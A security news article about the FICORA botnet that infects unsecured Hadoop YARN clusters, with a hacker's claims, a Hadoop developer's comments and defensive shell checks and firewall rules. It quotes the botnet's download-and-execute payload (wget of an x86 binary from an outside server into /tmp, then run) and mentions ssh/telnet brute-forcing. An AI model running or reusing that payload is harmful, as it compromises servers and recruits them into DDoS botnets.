In direct response to Radware’s analysis of the newly discovered DemonBot malware strain affecting Hadoop clusters, published earlier in the week of October 25th, 2018, 0x20k of Ghost Squad Hackers has released the full source code of the 0day exploit used to build his newest model: the FICORA Botnet. 0x20k, who is also credited as the author of the Yasaku Botnet, is a co-author of the 0day exploit provided below.
Unlike DemonBot, which is credited with infecting 70 servers to date, 20k claims to have infected over 1,000, with the potential for pulling over 350 Gbps – verified through Voxility.
According to 20k, also known as URHARMFUL, the author of the now-infamous DemonBot malware strain obtained his source code by stealing it off the servers of one of the authors of Owari, then dumping it online in September 2018. DemonBot’s “accolades,” in other words, are going to the wrong person, which is why 20k has decided to release his exploit into the wild to establish ownership before anyone tries to steal it away from him. 20k has also released several videos of himself testing various attacks on different servers and services, including OVH, NFO, ProxyPipe, and Mineplex – allegedly pulling anywhere from 110 Gbps to 200 Gbps.
In terms of how the two bots operate, they are extremely different. DemonBot infects through port 6982, over either port 22 or 23, depending on the availability of Python or Perl and telnetd on the device/server, whereas FICORA infects through port 8088. The DDoS attack vectors supported by DemonBot are UDP and TCP floods, whereas FICORA utilizes a URG flood on TCP/32. Moreover, DemonBot is just a renamed version of Lizkebab, whereas FICORA is similar to Mirai – but with different functions.
Full 0Day Exploit:
Rogue Security Labs has reached out to several of the affected services to confirm the validity of the attacks. While OVH declined to comment on the matter, John, aka Edge100x, President and CEO of NFO, confirmed each and every attack targeting their servers – of which there were three. ProxyPipe, on the other hand, took a defensive stance in response to my emails, claiming that their servers have never been crashed and that the company has never seen anything near 200 Gbps.
In response to the DoS attacks faced by NFO, John said, “The 110 Gbps number is likely from our website https://www.nfoservers.com/networklocations.php” – which it was – adding that “It is common for attackers to reference that site and assume that they generated that much traffic when they are able to trigger a null-route, though that’s not what it actually means.” He did not confirm or deny whether the FICORA botnet could pull that sort of traffic; he only claims that hitting the IPs listed on YouTube wouldn’t necessarily give the botnet owner an accurate reading of the traffic generated. He did say, though, that those IPs were certainly crashed on the selected dates.
Upon analysis, Steve Loughran, a software developer specializing in Apache Hadoop, told Rogue Security that “If this is happening on a YARN cluster where Kerberos is enabled, then somehow there’s a weakness in the YARN REST API where SPNEGO-authenticated verification of caller identity has failed. This is something we can look at and address. Or it could be something is playing with default passwords for management tools and using that to gain permission,” explaining that “It’s as if the cluster had telnet or rlogin enabled without password checks.”
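Loughran’s first scenario – a YARN REST API answering callers without any identity check – can be tested from the outside. The sketch below is my own defensive check, not part of the exploit: the helper inspects a response body from the ResourceManager’s documented /ws/v1/cluster/info endpoint, and the hostname in the usage comment is a placeholder.

```shell
# check_yarn_exposure: given the body returned by a ResourceManager's
# /ws/v1/cluster/info endpoint, report whether cluster metadata was
# served to an unauthenticated caller.
check_yarn_exposure() {
  if printf '%s' "$1" | grep -q '"clusterInfo"'; then
    echo "EXPOSED"
  else
    echo "OK"
  fi
}

# Typical use (resourcemanager.example.internal is a placeholder host):
#   check_yarn_exposure "$(curl -s http://resourcemanager.example.internal:8088/ws/v1/cluster/info)"
```

An “EXPOSED” result means the REST API is reachable without credentials – exactly the condition the malware relies on.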
However, as 20k explains, “FICORA contains telnet, ssh and hadoop servers.” For telnet they “used dictionary style brute-force, same as ssh, hadoop pulled the biggest amount of packets.” 20k added that a Remote Code Execution bug allowed him to execute an x86 binary from Hadoop’s /tmp directory.
The payload, then, was basically:

cd /tmp; wget http://botet.server/x86; chmod 777 x86; ./x86 hadoop.x86
Perhaps most importantly, as 20k explains in the release of the exploit, “we already bricked this exploit so good luck on pulling them.” For Hadoop developers this is particularly troubling. According to Mr. Loughran, all Apache can do for this problem is “issue advisories for clusters to turn on Kerberos,” adding that “For this particular cluster, turning off the YARN API may break things, but if the malware depends on its existence (and known HTTP port), reset this property in yarn-site.xml to its default value, false.”
“That may temporarily slow it down —albeit at the risk of breaking apps which depend on it— but if the malware can issue Hadoop RPC calls to YARN it can still submit work, or, as the HDFS filesystem will be equally unprotected, come in via the FS.”
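Loughran’s core advisory – turn on Kerberos – corresponds to the hadoop.security.authentication property in core-site.xml, whose insecure default value is “simple.” The helper below is a sketch of my own for auditing that setting; it is not from the exploit or from Apache.

```shell
# auth_mode: extract the hadoop.security.authentication value from a
# core-site.xml body. An absent property means the insecure default,
# "simple"; a secured cluster reports "kerberos".
auth_mode() {
  mode=$(printf '%s' "$1" | tr -d '\n' | sed -n \
    's|.*<name>hadoop.security.authentication</name>[^<]*<value>\([^<]*\)</value>.*|\1|p')
  echo "${mode:-simple}"
}

# Typical use, with HADOOP_CONF_DIR pointing at the cluster's config:
#   auth_mode "$(cat "$HADOOP_CONF_DIR/core-site.xml")"
```

Any cluster where this reports “simple” matches the unsecured configuration Loughran describes.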
Based on the script, Loughran notes that the exploit “isn’t a remote code execution bug, it is a remote job submission.” As of today, 10/31/2018, Apache is actively trying to figure out “if there’s some actual exploit of the Hadoop REST APIs even when security is enabled, or whether this is a case of a Hadoop cluster without security turned on is running somebody else’s code.” No patch for the exploit is known to exist, and as Mr. Loughran admits, considering that the exploit uses ssh ports to run brute-force dictionary attacks against foundational Linux servers, the fix is potentially “out of our scope.”
With that said, developers at Hadoop claim that the exploit listed above is “not a zero-day exploit.” More likely, they say, it is “an attack which schedules work on unsecured Hadoop clusters visible on the network.” Even so, Loughran can’t figure out exactly how the code works or compromises devices, saying “it may be that there is a real vulnerability in systems with Kerberos enabled. if that turns out to be the case, yes, that’s a 0-day.”
The fix for now, he says? “turn security on, don’t make your systems visible on the internet. indeed, keep in a private subnet with restricted access, if at all possible.”
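That “private subnet with restricted access” advice can be expressed as an ordinary firewall policy. The fragment below is an illustrative configuration sketch, not from the source: 10.0.0.0/8 stands in for whatever internal range actually needs access, and 8088 is the port FICORA reportedly infects through.

```shell
# Allow the YARN ResourceManager web port (8088) only from an internal
# range, and drop everything else. Requires root; rules shown here are
# not persisted across reboots.
iptables -A INPUT -p tcp --dport 8088 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 8088 -j DROP
```

Combined with Kerberos, this keeps the REST API off the public internet even if authentication is ever misconfigured.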
About the Author:
Brian Dunn is a writer & researcher formerly working as a content specialist for AnonHQ throughout 2015-2016. Today Brian Dunn owns and operates Rogue Security Labs, a small-time online security service, and Rogue Media Labs, a news/media startup attempting to change the way people read & consume cyber news/education.
(Security Affairs – Hadoop, hacking)